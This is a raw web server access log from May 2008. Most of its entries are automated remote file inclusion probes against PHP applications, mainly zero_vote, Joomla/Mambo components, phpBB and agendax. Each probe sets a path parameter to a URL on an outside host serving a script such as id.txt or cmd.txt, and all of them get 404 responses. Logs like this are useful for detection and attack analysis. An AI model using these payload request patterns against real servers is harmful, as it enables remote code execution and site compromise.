91.121.101.163 - - [04/May/2008:19:41:17 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
213.149.32.24 - - [04/May/2008:19:42:08 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:19:42:18 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:19:42:18 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:19:42:19 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:42:20 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:42:21 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
196.209.251.3 - - [04/May/2008:19:42:39 -0600] "GET /logs/access_log/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
196.209.251.3 - - [04/May/2008:19:42:40 -0600] "GET /playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.76"
196.209.251.3 - - [04/May/2008:19:42:41 -0600] "GET /logs/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.76"
195.219.133.78 - - [04/May/2008:19:43:18 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
87.106.16.18 - - [04/May/2008:19:43:55 -0600] "GET /logs/access_log/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
87.106.16.18 - - [04/May/2008:19:43:55 -0600] "GET /index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
87.106.16.18 - - [04/May/2008:19:43:55 -0600] "GET /logs/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
85.19.150.85 - - [04/May/2008:19:44:02 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:19:44:29 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:19:44:34 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:19:44:34 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:45:12 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:45:12 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:19:45:15 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:19:45:20 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
69.64.33.211 - - [04/May/2008:19:45:20 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
203.96.93.135 - - [04/May/2008:19:45:58 -0600] "GET /logs/error_log.2008020316%20http://musicroom.eclub.lv/body? HTTP/1.0" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.64.33.211 - - [04/May/2008:19:46:40 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
203.96.93.135 - - [04/May/2008:19:47:31 -0600] "GET /logs/access_log.2008020316%20http://musicroom.eclub.lv/body? HTTP/1.0" 404 251 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0)"
91.121.101.163 - - [04/May/2008:19:47:39 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:47:40 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
69.64.33.211 - - [04/May/2008:19:48:22 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
91.121.101.163 - - [04/May/2008:19:48:34 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:48:34 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
70.86.76.34 - - [04/May/2008:19:48:39 -0600] "GET /logs/access_log.20080420/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
70.86.76.34 - - [04/May/2008:19:48:39 -0600] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
70.86.76.34 - - [04/May/2008:19:48:39 -0600] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:19:49:49 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:19:49:49 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
80.68.203.22 - - [04/May/2008:19:51:34 -0600] "GET /errors.php?error=http://www.sergenubret.com/flv.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
221.128.79.156 - - [04/May/2008:19:51:42 -0600] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:19:51:42 -0600] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:19:51:43 -0600] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 253 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
221.128.79.156 - - [04/May/2008:19:51:46 -0600] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 248 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
213.149.32.24 - - [04/May/2008:19:52:24 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:19:52:25 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:52:26 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:52:27 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:53:54 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:53:54 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
70.86.76.34 - - [04/May/2008:19:54:28 -0600] "GET /logs/error_log.20080330/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
83.172.146.49 - - [04/May/2008:19:55:10 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
83.172.146.49 - - [04/May/2008:19:55:10 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
83.172.146.49 - - [04/May/2008:19:55:11 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
83.172.146.49 - - [04/May/2008:19:55:11 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
219.94.128.57 - - [04/May/2008:19:55:35 -0600] "GET /logs/access_log/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
219.94.128.57 - - [04/May/2008:19:55:35 -0600] "GET /index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
219.94.128.57 - - [04/May/2008:19:55:36 -0600] "GET /logs/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
203.23.237.236 - - [04/May/2008:19:55:58 -0600] "GET /logs/access_log.20080330/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
203.23.237.236 - - [04/May/2008:19:55:59 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
203.23.237.236 - - [04/May/2008:19:55:59 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
203.23.237.236 - - [04/May/2008:19:56:07 -0600] "GET /logs/access_log.20080420/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
66.225.229.167 - - [04/May/2008:19:57:00 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
208.112.43.2 - - [04/May/2008:19:58:19 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:19:58:19 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
85.19.150.85 - - [04/May/2008:19:59:11 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:19:59:11 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
67.195.52.109 - - [04/May/2008:20:03:23 -0600] "GET /?M=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
196.209.251.3 - - [04/May/2008:20:03:27 -0600] "GET /logs/access_log.20080427/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.76"
221.128.79.156 - - [04/May/2008:20:03:56 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:20:03:56 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:20:03:57 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 270 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
221.128.79.156 - - [04/May/2008:20:03:57 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.12.53.176 - - [04/May/2008:20:05:04 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:05:04 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:05:04 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:05:39 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:05:40 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:05:40 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
196.209.251.3 - - [04/May/2008:20:05:46 -0600] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.76"
196.209.251.3 - - [04/May/2008:20:05:47 -0600] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.76"
195.12.53.176 - - [04/May/2008:20:06:06 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
67.195.52.37 - - [04/May/2008:20:06:42 -0600] "GET /?D=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.12.53.176 - - [04/May/2008:20:06:43 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
211.233.89.217 - - [04/May/2008:20:07:37 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
67.195.51.242 - - [04/May/2008:20:08:20 -0600] "GET /?N=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [04/May/2008:20:08:29 -0600] "GET /?M=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.12.53.176 - - [04/May/2008:20:09:01 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:09:44 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:20:11:23 -0600] "GET /logs/access_log.20080413//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:11:23 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:11:23 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
67.195.51.190 - - [04/May/2008:20:11:30 -0600] "GET /?D=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.12.53.176 - - [04/May/2008:20:12:17 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:12:18 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
66.225.229.167 - - [04/May/2008:20:13:40 -0600] "GET /logs/error_log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
66.225.229.167 - - [04/May/2008:20:13:40 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
66.225.229.167 - - [04/May/2008:20:13:59 -0600] "GET /logs/error_log.20080420//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 293 "-" "libwww-perl/5.811"
85.25.145.85 - - [04/May/2008:20:15:03 -0600] "GET //skin/zero_vote/error.php?dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 231 "-" "Advanced Browser (http://www.avantbrowser.com)"
85.25.145.85 - - [04/May/2008:20:15:03 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 236 "-" "Advanced Browser (http://www.avantbrowser.com)"
216.6.180.69 - - [04/May/2008:20:15:09 -0600] "GET /logs/access_log.20080413//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:15:09 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:15:09 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
66.225.216.227 - - [04/May/2008:20:15:32 -0600] "GET //skin/zero_vote/error.php?dir=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
66.225.216.227 - - [04/May/2008:20:15:33 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.156.192.5 - - [04/May/2008:20:15:57 -0600] "GET //skin/zero_vote/error.php?dir=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
213.156.192.5 - - [04/May/2008:20:15:57 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
216.6.180.69 - - [04/May/2008:20:16:06 -0600] "GET /logs/access_log.20080413/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:16:06 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:16:06 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:16:16 -0600] "GET /logs/access_log.20080413/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:16:16 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:20:16:16 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
195.12.53.176 - - [04/May/2008:20:17:03 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:17:03 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:20:17:28 -0600] "GET /logs/access_log.20080427/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:20:17:32 -0600] "GET /logs/access_log.20080427/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
62.240.12.1 - - [04/May/2008:20:20:28 -0600] "GET //skin/zero_vote/error.php?dir=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
62.240.12.1 - - [04/May/2008:20:20:28 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 236 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
64.7.108.234 - - [04/May/2008:20:20:47 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.lapuntastudios.com/meser/administrator/components/com_joomla-visites/core/test.txt? HTTP/1.1" 404 258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.59.151.227 - - [04/May/2008:20:23:04 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:20:23:04 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:20:23:04 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
69.61.37.254 - - [04/May/2008:20:23:05 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:23:05 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:23:05 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:20:23:17 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:20:23:17 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:20:23:17 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
69.61.37.254 - - [04/May/2008:20:23:19 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:23:19 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:23:20 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:20:23:39 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:20:23:40 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
208.112.43.2 - - [04/May/2008:20:23:41 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:20:23:41 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
